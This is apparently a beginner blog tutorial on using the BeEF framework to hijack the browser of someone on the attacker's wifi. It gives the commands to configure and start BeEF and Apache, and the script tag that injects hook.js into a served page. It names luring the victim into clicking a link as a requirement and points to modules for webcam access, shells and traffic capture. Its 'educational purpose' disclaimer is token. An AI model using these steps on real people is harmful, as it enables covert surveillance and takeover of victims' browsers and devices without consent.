INTRODUCTION:
Some people think that Metasploit is the only way to hack a user’s device. But it is wrong. beef is a framework that can hack a browser which is being used by the user. it has a lot of modules. hacking a browser means that you can not also capture the traffic but also hack the webcam, start a shell and many more things. you can also merge Metasploit with it for advance attacks(Advance level).
In this tutorial, we will hack a user who is using our wifi, means he is on our network.
WARNING: you all know it, its for educational purpose. we don’t want you to hack your teachers at your school.
ATTACK:
It is important that you must have a way to make the user click on the link that we will create.
so first you need to start the tool and change the default creds. by the way, it is a web-framework. it runs on a local port.
so type this command to edit the default creds:
nano /etc/beef-xss/config.yaml
now you can run it with this command:
beef-xss
now go to the browser and type the URL http://127.0.0.1:3000/ui/panel
enter the creds that you changed before.
you will see something like this:
now we need some to hack. I am using myself as an example.
go to the 127.0.0.1:3000/hook.js and copy it and save it somewhere.
now we will start our apache service:
service apache2 start
we started the local webserver because we are gonna add the hook.js in a PHP/HTML file that will be hosted on our local server.
here, I am using a free templet you can download it from HEREÂ but if you have
now we will edit the index.html and will add the hook.js. but first, copy the hook.js and paste it in /var/www/html
folder.
open index.html in any editor and at the end of lines, paste the whole line:
<script src=hook.js> </script>
but you don’t need to do that because I have given you edited PHP file. just save it. now we can hack ourself.
go to browser and type in URL: 127.0.0.1/index.php
we will get a hooked browser on our beef web panel that we previously opened. now you can perform hacking.
now click on the local IP and you will see some indexes there. one of them is commands from where you can hack a device. because it has GUI, I am assuming that I don’t need to explain more. but if you have any problem, comment to us. for now, just run the modules(in commands) which have a green color.
Thanks For Visiting.